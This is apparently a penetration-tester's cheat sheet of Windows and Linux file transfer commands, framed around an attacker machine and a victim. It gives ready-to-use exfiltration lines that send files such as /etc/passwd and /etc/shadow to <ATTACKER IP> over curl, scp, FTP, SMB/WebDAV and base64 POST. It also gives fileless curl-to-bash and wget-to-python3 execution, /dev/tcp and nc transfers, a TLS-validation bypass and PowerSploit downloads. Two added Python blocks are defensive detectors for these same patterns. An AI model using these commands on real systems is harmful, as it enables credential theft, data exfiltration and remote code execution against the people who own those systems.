Windows File Transfer Methods
PowerShell Download
Using Net.WebClient and DownloadFile method
PS C:\user> (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\user> (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
Using Invoke-WebRequest
PS C:\user> Invoke-WebRequest '<Target File URL>' -OutFile '<Output File Name>' -UseBasicParsing
Bypassing SSL error
PS C:\user> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
PowerShell Upload
On the attacker server, run an upload server
$ python3 -m uploadserver
On the victim server, upload files to the server
PS C:\user> Invoke-FileUpload -Uri http://<ATTACKER IP>/upload -File <TARGET FILE>
Upload by converting to Base64
PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path <TARGET FILE> -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://<ATTACKER IP>/ -Method POST -Body $b64
SMB Download
Create an SMB share on the attacker server
$ sudo impacket-smbserver share -smb2support /tmp/smbshare
On the victim, download files from the attacker server
C:\user> copy \\<ATTACKER IP>\share\nc.exe
If Windows requires a user and password set on the SMB server, set those up
$ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Mount the drive on the victim
C:\user> net use n: \\<ATTACKER IP>\share /user:test test
SMB Upload
When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.
Set up an SMB-over-HTTP server using WebDAV on the attacker server
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Upload files from the victim server to the attacker server
C:\user> copy <TARGET FILE> \\<ATTACKER IP>\DavWWWRoot\
FTP Download
Host FTP on the attacker server
$ sudo python3 -m pyftpdlib --port 21
Download files from the victim machine
PS C:\user> (New-Object Net.WebClient).DownloadFile('ftp://<ATTACKER IP>/file.txt', 'ftp-file.txt')
Non-Interactive FTP download
C:\user> echo open 192.168.49.128 > ftpcommand.txt
C:\user> echo USER anonymous >> ftpcommand.txt
C:\user> echo binary >> ftpcommand.txt
C:\user> echo GET file.txt >> ftpcommand.txt
C:\user> echo bye >> ftpcommand.txt
C:\user> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
C:\user>more file.txt
This is a test file
FTP Uploads
Run an FTP server on the attacker machine
$ sudo python3 -m pyftpdlib --port 21 --write
Upload files from the victim machine
PS C:\user> (New-Object Net.WebClient).UploadFile('ftp://<ATTACKER IP>/ftp-hosts', '<TARGET FILE>')
Non-Interactive FTP upload
C:\user> echo open <ATTACKER IP> > ftpcommand.txt
C:\user> echo USER anonymous >> ftpcommand.txt
C:\user> echo binary >> ftpcommand.txt
C:\user> echo PUT <TARGET FILE> >> ftpcommand.txt
C:\user> echo bye >> ftpcommand.txt
C:\user> ftp -v -n -s:ftpcommand.txt
ftp> open <ATTACKER IP>
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT <TARGET FILE>
ftp> bye
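Each Windows method above leaves a recognisable string in process command-line or PowerShell script-block logging. The following Python matcher is an added example, not part of the original page; the rule names, the event fields (`host`, `command_line`) and the sample events are constructed for illustration.

```python
import re

# Rule name -> regex, one per Windows transfer method listed above (names are
# illustrative). Matched case-insensitively against a logged command line.
RULES = {
    "webclient-transfer": r"net\.webclient\)\s*\.\s*(?:download|upload)file(?:async)?\s*\(",
    "iwr-outfile": r"\b(?:invoke-webrequest|iwr)\b.*\s-outfile\b",
    "iwr-post-body": r"\b(?:invoke-webrequest|iwr)\b(?=.*\s-method\s+post\b).*\s-body\b",
    "tls-validation-disabled": r"servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}",
    "unc-path-to-raw-ip": r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\",
    "webdav-davwwwroot": r"\\\\[^\\\s]+\\davwwwroot\b",
    "ftp-script-file": r"\bftp(?:\.exe)?\s.*-s:\S+",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def classify(command_line):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]

def scan(events):
    """Return (host, matched rules) for every event with at least one hit."""
    hits = []
    for event in events:
        matched = classify(event["command_line"])
        if matched:
            hits.append((event["host"], matched))
    return hits

# Constructed process-creation events; 192.0.2.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"host": "ws01", "command_line":
        "powershell.exe -c (New-Object Net.WebClient).DownloadFile('http://192.0.2.10/a.bin','a.bin')"},
    {"host": "ws02", "command_line":
        "powershell.exe -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; "
        "Invoke-WebRequest 'https://192.0.2.10/a.bin' -OutFile a.bin"},
    {"host": "ws03", "command_line": r"cmd.exe /c copy report.xlsx \\192.0.2.10\DavWWWRoot\report.xlsx"},
    {"host": "ws04", "command_line": "ftp.exe -v -n -s:ftpcommand.txt"},
    {"host": "ws05", "command_line": r"powershell.exe -c Get-ChildItem \\fileserver01\projects"},
]

if __name__ == "__main__":
    for host, rules in scan(SAMPLE_EVENTS):
        print(host, rules)
```

The last sample event is a routine UNC access to a named file server and produces no hit; the raw-IP and DavWWWRoot rules are what separate it from the transfer patterns.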
Linux File Transfer Methods
Network Downloads
$ wget https://<ATTACKER IP>/file -O /tmp/file
$ curl -o /tmp/LinEnum.sh https://<ATTACKER IP>/file
Network Uploads
On the attacker server, run an upload server
$ python3 -m pip install --user uploadserver # install uploadserver
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' # create a self-signed cert
$ python3 -m uploadserver 443 --server-certificate /root/server.pem # start server
On the victim, upload files to the server. We need to specify `--insecure` because we are using a self-signed cert
$ curl -X POST https://<ATTACKER IP>/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
Fileless attacks
$ curl https://<ATTACKER IP>/script.sh | bash
$ wget -qO- https://<ATTACKER IP>/pythonfile | python3
Bash Downloads
Only works if Bash v 2.04 or greater is compiled with --enable-net-redirections
$ exec 3<>/dev/tcp/10.10.10.32/80 # Connect to the target server
$ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 # GET request
$ cat <&3 # print response
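Piping a fetched script straight into an interpreter and redirecting through `/dev/tcp` both appear verbatim in shell history or audit command lines. The following Python check is an added example, not part of the original page: it tokenizes each logged line the way a POSIX shell would, so a quoted `|` inside an argument is not mistaken for a pipe. The finding names and the sample history lines are constructed.

```python
import os
import re
import shlex

FETCHERS = {"curl", "wget"}
INTERPRETERS = {"bash", "sh", "python", "python3", "perl", "ruby", "php"}
# Bash network pseudo-device used as a redirection target, e.g. 3<>/dev/tcp/host/port
NET_REDIRECT = re.compile(r"[<>]\s*/dev/(?:tcp|udp)/[^/\s]+/\d+")

def split_pipeline(command):
    """Tokenize like a POSIX shell and split on unquoted '|' into argv stages."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars="|")
    lexer.whitespace_split = True
    lexer.commenters = ""  # '#' inside a URL must not start a comment
    stages = [[]]
    for token in lexer:
        if token == "|":
            stages.append([])
        else:
            stages[-1].append(token)
    return stages

def program(stage):
    """Name of the executed binary, skipping a leading sudo and VAR=value words."""
    for word in stage:
        if word != "sudo" and not re.fullmatch(r"\w+=.*", word):
            return os.path.basename(word)
    return ""

def findings(command):
    """Return the sorted list of finding names for one logged command line."""
    found = set()
    if NET_REDIRECT.search(command):
        found.add("dev-tcp-redirection")
    names = [program(stage) for stage in split_pipeline(command)]
    for i, name in enumerate(names):
        if name in FETCHERS and any(n in INTERPRETERS for n in names[i + 1:]):
            found.add("fetch-piped-to-interpreter")
    return sorted(found)

# Constructed shell history lines; 192.0.2.0/24 is a documentation range.
SAMPLE_HISTORY = [
    "curl https://192.0.2.10/script.sh | bash",
    "wget -qO- https://192.0.2.10/pythonfile|python3",
    "exec 3<>/dev/tcp/192.0.2.10/80",
    "curl -o /tmp/file https://192.0.2.10/file",
    "grep 'curl | bash' notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLE_HISTORY:
        print(findings(line), line)
```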
SSH/SCP Download
$ scp <ATTACKER USER>@<ATTACKER IP>:/file .
SSH/SCP Uploads
$ scp /etc/passwd <ATTACKER USER>@<ATTACKER IP>:/
Web Servers in other languages
$ python3 -m http.server
$ php -S 0.0.0.0:8000
$ ruby -run -ehttpd . -p8000
Transferring Files with Code
Python
$ python2.7 -c 'import urllib;urllib.urlretrieve ("https://attacker/file", "outputfilename")'
$ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://attacker/file", "outputfilename")'
PHP
$ php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
$ php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
$ php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
Ruby
$ ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
Perl
$ perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
JavaScript + cscript
Save the following code as `wget.js`
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); // argument 0: source URL
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // 1 = adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1)); // argument 1: output file name
Execute `wget.js` using PowerShell
> cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
VBScript + cscript
Save the following code as `wget.vbs`
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False ' argument 0: source URL
xHttp.Send
with bStrm
    .type = 1 ' 1 = adTypeBinary
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2 ' 2 = overwrite an existing file
end with
Execute `wget.vbs` using PowerShell
> cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1
Misc Transfers
Nc
Victim machine listening, ready to receive data and write it to a local file
$ nc -l -p 8000 > /dev/shm/evil
Attacker machine sending the file over
$ nc 192.168.49.128 8000 < evil
Doing the same, but over an allowed port (443)
$ sudo nc -l -p 443 -q 0 < /dev/shm/evil
$ nc 192.168.49.128 443 > evil
RDP
$ rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
$ xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer